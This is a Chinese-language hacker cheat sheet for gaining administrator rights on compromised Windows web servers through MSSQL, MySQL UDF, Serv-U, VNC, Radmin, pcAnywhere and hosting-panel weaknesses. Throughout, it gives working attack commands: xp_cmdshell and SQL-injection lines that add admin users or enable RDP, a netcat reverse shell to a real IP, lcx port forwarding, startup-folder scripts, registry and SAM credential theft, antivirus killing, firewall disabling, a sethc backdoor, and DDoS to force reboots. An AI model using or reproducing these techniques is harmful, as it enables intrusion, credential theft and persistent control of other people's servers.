/*
轉載請注明出處
ID:珍惜少年時
*/
21------------FTP //找到其FTP目錄,破解其密碼搜索,提之
22------------linux終端
23------------telnet //可以爆破,然后dos連接之,連接后添加用戶開啟終端端口,然后宣告拿下!
1433----------mssql提權 //需要找到sa密碼,一般存在於web.config文件中,uid pwd sa為關鍵字,找到該文件后Ctrl+f搜索關鍵字提之
3306----------mysql提權 //需要找到root密碼,提之.
4899----------radmin //破解注冊表提權
43958---------serv -u提權 //一般shell自帶的都有,直接使用自帶的進行提權嘗試即可。
5900----------vnc提權 //VNC提之
[此目錄大多可讀可寫]
C:\windows\temp\
關閉防火牆:
netsh firewall set opmode disable
關閉08r2防火牆命令 netsh f set op di
[服務器常見的殺毒軟件]
360tray.exe 360實時保護
ZhuDongFangYu.exe 360主動防御
KSafeTray.exe 金山衛士
McAfee McShield.exe 麥咖啡
SafeDogUpdateCenter.exe 安全狗
【filezilla提權】
提權思路:
【mssql提權/1433提權/sa提權/sa提權/mssql數據庫提權】
關於mssql 的注入,可以使用sqlninja 來恢復組建等操作,該工具與sqlmap 不同的是偏向於獲得shell。kali里有。
思路:最主要的還是找到mssql數據庫的賬號密碼,找到之后執行mssql命令提權,如果cmd_shell組建被刪除也可以進行自己修復(工具包里的sql查詢分析器)
也可以在aspx的shell下進行操作,你懂的啦~哦,對了,可以用sql綜合利用工具直接連接了之后進行dos操作!你懂~~如果說3389沒開,也可以用mssql執行
命令開啟啦,至於命令嘛 百度一下你就知道
找配置文件,配置文件一般都是web.config或者conn.asp再或config.asp之類的文件(也可以到注冊表找sa密碼)
在配置文件內找到mssql連接信息,即mssql的賬號密碼等配置信息,uid,pwd即為其賬號密碼。直接在aspx馬子哪兒找到
數據庫選擇mssql數據庫,然后完整填寫好數據庫連接信息.然后直接在哪兒執行一下提權命令.
格式:exec master.dbo.xp_cmdshell '命令';--
SQL增加用戶:exec master.dbo.xp_cmdshell 'net user fcu xieyingshentouxiaozu /add';--
SQL提升權限:exec master.dbo.xp_cmdshell 'net localgroup administrators fcu /add';--
倘若執行不了命令可能xp_cmdshell組建刪除,執行該命令即可Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
(在aspx環境下)開啟cmd_shell方法
sqlExec:XP_cmdshell exec
(可以用sql查詢分析器下)開啟cmd_shell方法
連接上去后
執行以下代碼:
EXEC sp_configure 'show advanced options', 1
GO
RECONFGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO
Mssql一些sql語句:
1.檢測與恢復擴展存儲
判斷xp_cmdshell擴展存儲是否存在
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell')
判斷xp_regread擴展存儲過程是否存在
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
恢復
;exec sp_dropextendedproc 'xp_cmdshell'
;exec sp_dropextendedproc xp_cmdshell,'xplog70.dll'
新建用戶
;exec master..xp_cmdshell 'net user fuchou$ fuchou /add'
;exec master..xp_cmdshell 'net localgroup administrators fuchou$ /add'
【mysql提權/3306提權/3306端口提權/mysql注冊表/mysql路徑/phpmyadmin提權/phpmyadmin 提權/UDF提權/】
思路:UDF~執行mysql調用cmd_shell組建添加用戶,然后搗鼓個vbs到重啟那兒!讓服務器重啟一下,賬戶就自動加上了!嘻嘻~你懂
還有一個方法就是mof提權。
創建cmdshell的函數有兩個。
一個是cmdshell
一個是sys_eval:create function sys_eval returns string soname 'udf.dll'
倘若有waf以致執can't open啥的可以結束掉waf“ntsd -c q -p PID 1234”后面加他的pid就可以了。
如果存在特殊情況:
提權時,當下載mysql的user.MYD數據庫連接密碼hash值無法用winhex等十六進制編輯器查看時:
本地搭建mysql,先停止本地mysql服務
將下載的user.MYD user.frm user.MYI替換本地文件,然后
cd mysqlbin
mysqld-nt --skip-grant-tables
重新打開一個cmd
mysql -u root
select user,password from mysql.user;
UDF提權;
[前提root權限]原理通過root權限導出udf.dll到系統目錄下,可以通過udf.DLL調用cmd執行命令。
導出目錄
c:\winnt\udf.dll 2000 [這兩個都是mysql ]
c:\windows\udf.dll 2003 [數據庫版本為5.0以下的 ]
找root密碼,一般存在於config之類的配置文件里,上UDF,然后導出dll,然后提之
可能遇到的問題:1.找不到配置文件,直接馬子帶的搜索工具,搜一下你就找到
2.UDF導出失敗,這個很常見!直接找到其mysql安裝目錄
Root密碼可在mysql目錄下的(user.MYD,一般是16位或者40位)該文件中找到,不過是經過加密的.直接用c32打開,頭文件就是密碼啦.去cmd5解密吧.拿到密碼,UDF提權之。。。你懂。
如果密碼看不見,或是組合不到40位,就本地安裝一個mysql吧, 1、停止mysql服務 2、替換下載下來的3個文件(user.MYI user.MYD user.frm) 3、cmd切換到bin目錄下,進入mysql安全模式,cmd命令:mysqld-nt --skip-grant-tables 4、重新打開一個cmd 切換到bin目錄下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot -proot 5、最后查詢一下就出來了select user,password from mysql.user;
mysql注冊表的位置:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MySQL\ //在此可以看到mysql的安裝位置
以下是mysql執行語句調用cmd_shell提權
mysql執行命令提權(賬號:fuchou$ 密碼:fuchou!@#)
mysql>create table a(cmd text); //表a 字段cmd text文本類型
mysql>insert into a values ("set wshshell=createobject(""wscript.shell"")");
mysql>insert into a values ("a=wshshell.run(""cmd.exe /c net user fuchou$ fuchou!@# /add"")");
mysql>insert into a values ("b=wshshell.run(""cmd.exe /c net localgroupo administrators fuchou$ /add"",0)");
mysql>select * from a into outfile "c://docume~1//administrator//「開始」菜單//程序//啟動//choukuo.vbs";
然后讓服務器重啟(ms12010)就好了!
以下是mof提權
1.直接上傳mof.php直接執行dos命令提權~
2.mof文件里搗鼓個用戶加之[未完~~]
【21端口FTP提權】
如果21端口開放那么可能網站是通過Ftp進行管理,此時我們可以嘗試找到其Ftp文件目錄,覆蓋住FTP的文件即可提權。或者爆破Ftp
【lcx內網轉發/內網提權/neiwangzhuanfa/neiwangtiquan/端口轉發/內網轉發/】
梗概:將服務器的3389通過lcx.exe轉發到本地的
將服務器的3389端口轉發到本地的19端口,然后我們外網電腦監聽19端口並且轉發到9999端口.從而就將服務器的3389端口間接地轉發到了9999端口.
本地執行
lcx.exe -listen 19 9999 /*15為監聽端口,9999為轉發端口*/
shell執行
lcx.exe -slave 服務器IP/即shell IP/即目標要轉發的IP 19 127.0.0.1 3389
連接 遠程桌面填上地址為 服務器內網IP:9999
###源於互聯網,恐咱寫的不夠全面
端口轉發
適用情況:
1.目標主機在內網,我們無法鏈接(這種情況和第二種適用方法一樣)
2.目標主機有防火牆,阻斷我們鏈接
lcx.exe -slave 你的IP 你監聽的端口 肉機IP 要轉發的目標主機端口
防火牆一般是會阻斷由外向內的通信,而不會阻斷由內向外的通信,因此我們可以利用這個原理實現端口轉發
本機: lcx -listen 2222 3333
2222為轉發端口,3333為本機任意未被占用的端口
肉雞:lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 為本機IP,2222為轉發端口,127.0.0.1為肉雞內網IP,3389為遠程終端端口
3389連接時格式 127.0.0.1:3333
### 結束###
### nc反彈:
webshell下面執行命令有時候沒有回顯,在nc反彈的窗口下面是有回顯的。
通過webshell反彈的cmd繼承IIS的權限,一般權限較低。但是還是很方便執行系統命令的
E:\web\nc -vv 125.92.61.202 8080 -e E:\web\cmd.exe(webshell執行的)
nc -vv -l -p 8080 (本機執行的)
-l:監聽端口,監聽入站信息
-p:后跟本地端口號
-v:顯示端口的信息,如果使用-vv的話,則會顯示端口更詳細的信息
E:\web\nc -l -p 110 -t -e E:\web\cmd.exe
telnet 連接服務器ip 端口
-l 監聽本地入棧信息
-p port 打開本地端口
-t 以telnet形式應答入棧請求
-e 程序重定向
### 結束###
【Pcanywhere提權/Pcanywhere遠控提權】
思路:找到安裝目錄破解(破解軟件:symantec pcanywhere password crack)pcanywhere配置文件(PCA.serven.CIF),然后本機搭建pcawhere環境進行遠程連接目標機
以下是詳細步驟
pcanywhere默認安裝目錄:C:\Program Files\sysmantec\pcanywhere
需要在本地安裝此軟件,然后找到后綴為cif的(在其安裝目錄的Hosts目錄下)。保存至本機。並下載專門的pcanywhere破解軟件進行破解。
破解完成后打開Pcanywhere遠程軟件新建一個主控端連接目標服務器。
具體操作如下;
選擇主控端-右鍵選擇高級-設置(輸入目標IP)-安全性選項(設置級別:pcanywere編碼)-成功操作完成
點擊你剛才新建的主控端右擊開始遠程遙控,然后需要登錄,直接輸入你破解的CIF的帳號密碼登錄即可。
以下非本人所筆,來源於互聯網因(怕各位覺得俺寫的不夠全面)
### pcanywhere提權:
在服務器里安裝好軟件,添加被控端,設置好密碼就ok了,在本機安裝好軟件,添加主控端,填上ip,密碼等,選好加密 方式(任一都可以),直接連接
pcanywhere所開放的端口5631、5632
利用工具破解*.cif文件
默認路徑: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts
找到hosts目錄的.cif文件。然后本地明小子破解。
### 結束###
【serv-u提權/serv -u提權/serv u提權/43958提權/43958端口提權】
serv-u默認安裝目錄:C:\Program Files\rhinosoft.com\serv-U
serv-u密碼文件:ServUDaemon.ini
端口如果改了可以通過pid查看
或者可以到serv u的配置文件里面去找!
SerUDaemon.ini這個文件
lccalsetuportNo=端口
----------------------------------
--管理員修改了serv u 密碼--------
----------------------------------
進入其安裝目錄找到serv u的ServUDaemon.ini這個文件(該文件時儲存密碼的),然后將密碼丟到shell里面去,然后進行serv-u提權,不過一般管理員並不修改serv-u的密碼
----------------------------------
----------無修改權限提權----------
----------------------------------
直接在大馬自帶的serv-u自帶的那里提權,倘若失敗,請嘗試下列思路。
直接下載servuadmin.exe(在serv-u默認安裝目錄下)利用C32打開搜索其IP(或搜索port,LocalSetupPassword=,localadministrator),IP后面的第一個
為帳號,賬號后的即為密碼。(默認的賬號為localadministrator)然后再到serv-u自帶的提權窗口進行修改帳號
密碼從而提權。
----------------------------------
------------修改權限提權----------
----------------------------------
進入其serv-u默認安裝目錄(小技巧:桌面找到他的安裝快捷方式下載下來查看那),找到ServUDaemon.ini該文件,嘗試是否可以修改,倘若可以,便可執行以下步驟,
反之即為無修改權限提權,添加一個user。然后添加以下內容;
[USER=fcz|1] //用戶名
Password=202CB962AC59075B964B07152D234B70 //用戶密碼加密后的密文,密碼為123
HomeDir=c:\ //默認根目錄
TimeOut=600 //超時時間設置
Maintenance=System //權限
Access1=C:\|RWAMELCDP //可訪問的目錄及權限
Access2=d:\|RWAMELCDP //可訪問的目錄及權限
Access3=e:\|RWAMELCDP //可訪問的目錄及權限
注解:斜杠為理解之用,並非也要予以添加。
添加完成后即可開始邪惡計划,打開Dos
鍵入以下內容;
ftp 目標IP 然后回車然后輸入你剛才新建的用戶名即為fcz和密碼123,然后執行以下命令;
quote site exec net user fuchouzhe 123 /add
quote site exec net localgroup administrators fuchouzhe /add
完工。
小知識;bye命令即為退出目標計算機。
如果管理員將serv u的密碼給改了,可以到這里去查看查看密碼,然后在大馬哪里修改並進行serv u提權
以下源於互聯網,害怕俺寫的不夠全面。
### Serv-U目錄有修改提權:
ServU 密碼加密存儲方法
首先隨機生成2位字符(從a-z小寫字符).
再將用戶原始密碼與這2位隨機字符合並成為新的密碼字符.
如: 用戶原始密碼為a,隨機生成字符為dx,則合並后新的密碼字符串為:"dxa"
再使用新密碼字符串進行MD5 Hash運算.
dxa=F2319AE3B312103BB3259CA8242DD16C
然后再存儲到ini文件,存儲方法為2位隨機字符加上新密碼字符的MD5 Hash值.
如下:
[USER=a|1]
Password=dxF2319AE3B312103BB3259CA8242DD16C
ServU 密碼破解方法:
除去前2位隨機字符獲得F2319AE3B312103BB3259CA8242DD16C.
把該MD5 Hash值存入暴力破解工具,產生字典時注意前2位密碼必定是dx.
F2319AE3B312103BB3259CA8242DD16C=dxa
提權思路:Serv-U 修改serv-u配置文件 添加超級管理員
步驟:
[USER=lx|1]
Password=uc8270A0A37BE006573C96DB29DF42DEE8
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
用cmd登陸ftp,,然后在執行下列命令添加用戶
quote site exec net user 用戶 密碼 /add 添加用戶
quote site exec net localgroup administrators 用戶 /add 添加到管理員組
C:\Program Files\RhinoSoft.com\Serv-U 默認端口43958 修改的文件ServUDaemon.ini (默認路徑)
注意:添加失敗的原因可能添加的用戶名重名,試試其他組合的用戶名,,User2=pp|1|0 (用戶的順序一定要設置好)
### 結束###
【flashfxp提權】
思路:下載flashfxp下的配置文件(quick.dat)覆蓋到本地,然后星號查看器查看出密碼,你懂啦~
falshfxp默認安裝目錄:C:\Program Files\flashfxp
在其安裝目錄中找到以下文件並予以下載
quick.dat
然后本機下載且安裝flashfxp,將以上三個文件放置於本件安裝安裝flashfxp目錄下,會提示已經有了是否覆蓋
直接點擊確定覆蓋。然后再次打開flashfxp快速連接,在歷史的那里就直接有目標機的地址了。帳號輕而易舉的獲
得(用星號查看器),如此便OK。可以嘗試用ftp密碼當作3389的密碼登錄試試!
【寫入啟動項提權/啟動項里提權】
查看C:\Documents and Settings\All Users\「開始」菜單\
是否可讀可寫,倘若可寫請輸入以下代碼。
@echo off
net user xieying fuchou /add
net localgroup administrators xieying /add
如此一來僅需等待服務器重啟即可。可以用dos執行重啟命令喲。或者D他,使其重啟。
【VNC密碼破解提權/vnc提權/5900端口開放/5900開放/5900入侵/】
思路:通過注冊表讀取出vnc十進制的密碼,然后轉化為十六進制,最后用vncx4.exe輸入十六進制的密碼破解,遠程連接之!
默認安裝目錄:C:\Program Files\RealVNC\VNC4
直接進注冊表(HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password)獲取密碼即可,如果說跟路勁無效什么的,那可能是權限不夠,以文本形式打開以后
ctrl+f搜索password
讀出來的密碼是十進制 要轉換為16進制,然后將十六進制的用vncx4.exe破解
使用方法如下;
dos下使用vncx4.exe執行命令vncx4.exe -W //W是大寫的。(輸入轉換十六進制后的數值)
破解成功就直接用vnc直接連接唄。
以下非本人所筆,來源於互聯網因(怕各位覺得俺寫的不夠全面)
### vnc遠控提權:
這二個目錄有關於vnc安裝的信息,有此目錄代表服務器安裝了vnc
C:\Program Files\RealVNC\VNC4
C:\Documents and Settings\All Users\「開始」菜單\程序\RealVNC
Vnc開發的端口為5900 密碼存放在注冊表中 地址為
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password (vnc4密碼在這個鍵值里)
HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber (vnc4的端口)
HKCU\Software\ORL\WinVNC3\Password (vnc3的密碼)
HKCU\Software\ORL\WinVNC3\PortNumber (vnc3的端口)
1.找到vnc4.0版本的注冊表鍵值,
2.然后轉換成16進制
3.用vncx4破解
4.本地安裝vnc
5.本地連接
密碼的破解:
cmd切換到vnc4的目錄,,
命令行錄入:vncx4 -W
備注:此處參數W是大寫
然后順序錄入上面的每一個十六進制數據,每錄完一個回車一次就行了。
### 結束###
【radmin/4899/4899提權/radmin提權】
思路:讀取radmin密碼知曉密碼的十進制然后轉化為十六進制得到正確的密碼,遠程連接
以下是密碼儲存注冊表地址:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter
以下是端口儲存注冊表地址:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\port
讀取出來的是十進制的密碼,要轉換成十六進制。記得要小寫!!!
現在仿佛很多shell里面都自帶的有radmin提權,你懂~
然后用[Radmin_Hash.exe]進行用HEX直接連接(連接的時候記得小寫).可能因為版本的緣故,仿佛現在radmin已經更新到3.0了 上面這個仿佛可能不管用。
--------------------------------------------------------------------------------
常見虛擬主機常見路徑
D:\virtualhost\web580651\www\ 新網虛擬主機
F:\usr\fw04408\xpinfo\ 萬網虛擬主機
D:\hosting\wwwroot\ Prim@Hosting虛擬主機
e:\wwwroot\longzhihu\wwwroot\ 華眾虛擬主機
d:\freehost\zhoudeyang\web\ 星外虛擬主機主機
D:\vhostroot\LocalUser\gdrt\ 星外分支
f:\host\wz8088\web\ 星外分支
D:\vhostroot\localuser\ vhostroot
###源於互聯網,恐咱紕漏
radmin2.1提權
RADMIN的注冊表項位於HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\ Parameter(在這個鍵值保存着密碼)
在本機安裝radmin,,把上面的密碼鍵值導出,上傳到webshell的可寫目錄中
cmd下執行下列2行的命令:
REGEDIT -E C:\123.REG HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters (導出密碼文件到c盤,c盤要有可寫目錄)
此步驟可以省略,直接導入本機的密碼,實驗通過。
REGEDIT -s C:\456.REG HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters (導入密碼到注冊表)
然后本機連接服務器ip,密碼是本地radmin密碼
###結束###
【LPK提權/lpk 提權/LPKtiquan/lpk tiquan】
所用工具:tools lpk sethc v4.0.exe
要提前設置好熱鍵,然后連接遠程的時候按五下shift 然后在按你設置的熱鍵,多按幾次吧,
lpk.dll存在於可執行程序目錄中會自動被調用,直接放到網站上面去,然后執行一個exe就可以觸發該漏洞。
【星外主機/星外虛擬主機/星外提權/7i24/freehost/7i24目錄/freehost目錄/xingwai/xingwaizuji/】
如何知道是不是星外主機?
1.看到網站目錄在這個文件夾下(freehost)或者(7i24)則很有可能是星外了
2.asp大馬里點擊程序,存在“7i24虛擬主機管理平台”“星外主機”之類的文件夾
3.開始菜單哪兒也是可以看到底
拿到星外果斷先登陸一下他默認賬號密碼。
注:在星外中一般不允許上傳解析格式的文件呢(asp之類的)但是闊以上傳.com或者.txt的
星外主機提權思路(1.ee.exe提權 2.vbs提權 3.注冊表獲得sa密碼/星外sa提權)
[One]ee.exe提權法
找個可讀可寫目錄上傳ee.exe
c:\Program Files\Microsoft SQL Server\100\Shared\ErrorDumps\ee.exe
cmd命令:/c c:\windows\temp\cookies\ee.exe-i(獲取星外帳號的id值,例如回顯:FreeHostID:724)
接着命令:/c c:\windows\temp\cookies\ee.exe-u724(獲取星外的帳號密碼)
遠程連接之
[Two]vbs提權法
找個可讀可寫目錄上傳cscript.exe和iispwd.vbs
cmd執行:/c "c:\windows\temp\cookies\cscript.exe"c:\windows\temp\cookies\iispwd.vbs
意思是讀取iis,不但可以獲取星外的帳號密碼(在最下),還可以看到同服務器上的所有站點的目錄。
讀取到了數據以后找一下ctrl+f搜索一下“7i24”在其旁邊就有加密的賬號密碼
默認帳號:freehostrunat
默認密碼:fa41328538d7be36e83ae91a78a1b16f!7 /*明文,沒有加密直接登錄!*/
這個用戶是安裝星外時自動建立的,已屬於administrators管理組,而且密碼不需要解密,直接登錄服務器即可!
[Three]sa提權
星外sa密碼注冊表位置:HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11
[PS]:安全模式大部分是存在於星外主機上,其他主機出現較少!
而且星外主機提權最好用aspx大馬,因為權限比較高,提權成功率就比較高!
星外常寫目錄:
C:RECYCLER
C:windowstemp
e:recycler
f:recycler
C:phpPEAR
C:WINDOWS7i24.comFreeHost
C:phpdev
C:System Volume Information
C:7i24.comserverdoctorlog
C:WINDOWSTemp
c:windowshchiblis.ibl
C:7i24.comiissafelog
C:7i24.comLinkGatelog
C:Program FilesThunder NetworkThunder7
C:Program FilesThunder NetworkThunder
C:Program FilesSymantec AntiVirusSAVRT
c:windowsDriverPacksCAM2
C:Program FilesFlashFXP
c:Program FilesMicrosoft SQL Server90SharedErrorDumps
C:Program FilesZendZendOptimizer-3.3.0
C:Program FilesCommon Files
c:Documents and SettingsAll UsersApplication DataHagel TechnologiesDU Meterlog.csv
c:Program Files360360SafedeepscanSectionmutex.db
c:Program FilesHeliconISAPI_Rewrite3error.log
c:Program FilesHeliconISAPI_Rewrite3Rewrite.log
c:Program FilesHeliconISAPI_Rewrite3httpd.conf
c:Program FilesCommon FilesSymantec SharedPersist.bak
c:Program FilesCommon FilesSymantec SharedValidate.dat
c:Program FilesCommon FilesSymantec SharedValidate.dat
C:Program FilesZendZendOptimizer-3.3.0docs
C:Documents and SettingsAll UsersDRM
C:Documents and SettingsAll UsersApplication DataMcAfeeDesktopProtection
C:Documents and SettingsAll UsersApplication Data360safesoftmgr
C:Program FilesZendZendOptimizer-3.3.0libOptimizer-3.3.0php-5.2.xZendOptimizer.dll
C:Documents and SettingsAll UsersApplication DataMicrosoftMedia Index
【N點虛擬主機】
如何判斷是否為你n點虛擬主機?
1.網站存在於npointhost該目錄下
2.用戶信息在說明(description)這兒看到N點虛擬主機
即可說明服務器存於N點虛擬主機內
N點主機提權思路
One.利用破解腳本破解sa密碼.然后直接sa提權
其步驟:在網站根目錄有一個host_data的文件夾,進去將其數據庫下載,找到hostcs表下的mssqlpass密碼(有進行加密),然后用破解腳本(提權倉庫有),將sa密文放到破解腳本里面去,然后直接丟到
網站,然后瀏覽之,即可看到正確的sa密碼,然后可sa提權之。
過狗提權/bypasssafedog提權/過夠/過狗總結/安全狗/safe dog/safedog
1.直接修改管理員密碼
2.直接修改guest
然后reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "c:\1.reg" 導出來 下載后修改 把V刪除 把1F4改成1F5 然后再導入 就成了
密碼就是1了
3.如果說權限是system的話直接用wce.exe直接讀取hash(使用方法:)wce.exe -l
4.當然system也可以上遠控
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+EXP那些事
+
+ms15-051------------2008 r2
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+提權經驗筆錄
+
+ ◇.提權前(tasklist)看一下在運行那些東西,看一下有沒有殺毒軟件之類的.然后對症下葯.
+
+ ◇.cmd無法執行/cmd拒絕訪問/
+ 1.防護軟件攔截taskkill /f /im ZhuDongFangYu.exe
+ 2.cmd被降權
+ 3.組建被刪除
+ 解決思路:找一個可讀可寫的目錄上傳cmd或者傳一個aspx木馬
+ 4.可讀可寫的上傳上去了還是拒絕訪問,這時候可能是因為沒有權限執行,上傳一個rar然后解壓到可以執行的地方去。就可以解決!
+
+ ◇.有時候net user admin admin /add不行的話就用net user admin /ad
+
+ ◇.有時候明明可以添加上的用戶,卻沒有添加上,試試把密碼改的難一些,管理員可能對密碼進行了要求的!
+
+ ◇.wscript.shell組件不支持,那就傳個aspx馬試試,aspx馬不需要該組件支持。
+
+ ◇.如果不能直接添加用戶,試試修改管理員賬號密碼:net user adminitrator fuchouzhe //將管理密碼修改為fuchouzhe
+
+ ◇.如果systeminfo看到補丁情況(三百個大約為平衡點)很少的話,直接上EXP提權試試
+
+ ◇.[iis6.0exp狀況]當使用iis6.0exp提權時候,正在執行“net use” 卻返回(提示)“Can not find wmiprvse.exe”
+
+ 此時我們僅需關閉wmiprvse.exe該進程即可.用命令關閉wmiprvse該進程:taskkill /f /t /im .exe
+
+ ◇.有時候程序所對應的端口沒有開(例如:mysql開啟了卻沒有開放3306端口),極有可能是被修改了端口
+ 這個其實和尋找終端端口類似,比如有運行mysql卻沒有開放3306,怎么找出mysql被更改的端口呢。
+ tasklist /svc執行后瞅見mysql運行,找到其對應PID,然后netstat -ano看一下PID對應的端口即可。
+
+ ◇.如何查看終端端口/遠程端口/遠程終端/遠程連接/3389/開3389/遠程問題/遠程連接/3389連接/開啟3389/開啟終端端口
+ (1)執行cmd鍵入“tasklist/svc & netstat -ano”然后找到(svchost.exe)TermService所對應的PID,然后在下面找到PID所對應的端口,即為終端端口
+ 亦或先執行tasklist /svc查看Termserver對應的PID,然后再輸入命令netstat -ano找PID對應的開放端口
+ (2)aspx大馬哪里直接查看“系統信息”
+ (3)找注冊表(注:PortNumber即為遠程端口)
+ ①.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\
+ ②.HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
+ (4)如果是不知道終端端口的話,嘗試一下跑出所有其開放的端口(用nmap跑之)然后試之,亦或可以讀取注冊表然后日之
+
+ (5)SQL語句直接開啟3389/SQL語句直接開啟3389
+ [3389注冊表位置:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections]
+ [其中鍵值DenyTSConnections 直接控制着3389的開啟和關閉,當該鍵值為0表示3389開啟,1則表示關閉。]
+ [而MSSQL的xp_regwrite的存儲過程可以對注冊進行修改,我們使用這點就可以簡單的修改DenyTSConnections鍵值,]
+ [從而控制3389的關閉和開啟]
+ 開啟3389的SQL語句:
xxx.com/fuchou.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–
+ 關閉3389的SQL語句:
xxx.com/fuchou.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–
+
+
+ ◇.net被禁用/net user不行
+ 解決方法挺多的,試試net1,不行的話上pr,iis6.0試試0day
+
+ ◇.sa提權困難/sa提權問題/
+ 若提示:SQL Server 阻止了對組件 'xp_cmdshell' 的 過程 'sys.xp_cmdshell' 的訪問,因為此組件已作為此服務器安全配置的一部分而被關閉,
+系統管理員可以通過使用 sp_configure 啟用 'xp_cmdshell'。有關啟用 'xp_cmdshell' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。
+ 則沒有開啟那個組件的支持.自己開啟以下就可以(需根據mssql version數據庫版本來搞.在sql exec那里開啟.)最終添加命令時(sqlexec)要選擇sql servver exec來執行添加用戶命令.
+
+ ◇.Active不能創建對象,一個aspx,exp,配合用。如果是iis的試一下iisup.exe,或者執行工具包里的bat
+ 把
試一試。
+
+ ◇.安全狗怎么提權?
+ 如果是system權限直接殺死狗,即可
+ 但是大多數都不是system權限,所以呢,傳一個免殺的遠控最好不過了
+ 弄一個后門,然后調用任務管理>
',關掉安全狗
+ 用殺狗的exp。
+ 把服務器打重啟吧,ddos。沒事12020/12010如果沒有必要最好不要,危害性極大。
+ ◇.shift后門替換位置/shift后門/shift服務后門
+ C:\WINDOWS\system32\sethc.exe
+ C:\WINDOWS\system32\sethc.exe.exe 將sethc.exe換成自己的shft就可以了。
+
+ ◇.cmd執行exp沒有回顯/exp無回顯/exp沒有回顯/cmd exp 回顯/exp cmd 回顯/iis6.0無回顯/iis6.0沒有回顯/
+ 如果說是這樣的話,可以嘗試shell里面cmd路徑的路徑填寫exp的路勁,在語句哪兒執行“net user fuchou fuchou /add”
+ 例:
+ cmd路徑:c:\windows\temp\iis6.0.exe
+ 語句 :c:\windows\temp\ms08067.exe //也可以直接執行“net user admin admin /add” 如果說直接執行不了,的話
+ 可以再傳一個cmd放在語句塊執行.例(c:\windows\temp\cmd.exe "net user fuchou fuchou /add")
+
+ ◇.mysqlroot賬號密碼的查找/mysql root賬號密碼
+ 1.在敏感文件下查找,比如config之類的
+ 2.在mysql的安裝目錄下找到mysql該文件夾的目錄,再次目錄下含有一個user.MYD的文件,下載下來。打開你會root賬號密碼
+ 3.爆破吧。
+ ◇.getpass使用方法
+ getpass.exe >1.txt
+ [社工演義法]
+
+ ◇.在提權過程當中,實在沒辦法,必要的時候可以拿服務器的注冊所有人和注冊的組織來進行社工進而拿下服務器權限!
+
+ ◇.同上也是屬於一個社工的思路,如果找到mysql的話可以用mysql的密碼當作終端端口的密碼來進行登錄,說不准有意外收獲!
+
+
+
+
+
+
+
+
+
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
【轉載】注冊表中一些敏感的位置/注冊表/注冊表敏感目錄/
HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerMSSQLServerSuperSocketNetLibTcp Mssql端口
HKLMSYSTEMCurrentControlSetControlTerminal Server DenyTSConnections 遠程終端 值為0 即為開啟
HKEY_LOCAL_MACHINESOFTWAREMySQL AB mssql的注冊表位置
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 華眾主機注冊表配置位置
HKEY_LOCAL_MACHINESOFTWARECat SoftServ-UDomains1UserList serv-u的用戶及密碼(su加密)位置
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer WinStationsRDP-Tcp 在該注冊表位置PortNumber的值即位3389端口值
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers mysql管理工具Navicat的注冊表位置,提權運用請谷歌
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters Radmin的配置文件,提權中常將其導出進行進行覆蓋提權
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots IIS注冊表全版本泄漏用戶路徑和FTP用戶名漏洞
HKEY_LOCAL_MACHINEsoftwarehzhostconfigSettingsmastersvrpass 華眾主機在注冊表中保存的mssql、mysql等密碼
HKEY_LOCAL_MACHINESYSTEMLIWEIWENSOFTINSTALLFREEADMIN11 星外主機mssql的sa賬號密碼,雙MD5加密
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual RootsControlSet002 星外ftp的注冊表位置,當然也包括ControlSet001、ControlSet003
--------------------------------------------------------------------------------------------
|提權技巧大全:
|1.如果連接服務器出現連接段超過最大請求/終端超出最大允許連接,直接運行mstsc /admin
|2.開始-運行(鍵入mstsc)直接快捷啟動遠程桌面連接.
|3.怎么找同服務器支持aspx的站點?利用bing搜索:ip:服務器ip aspx
|4.
|5.
|
|
|
--------------------------------------------------------------------------------------------
| FTP命令
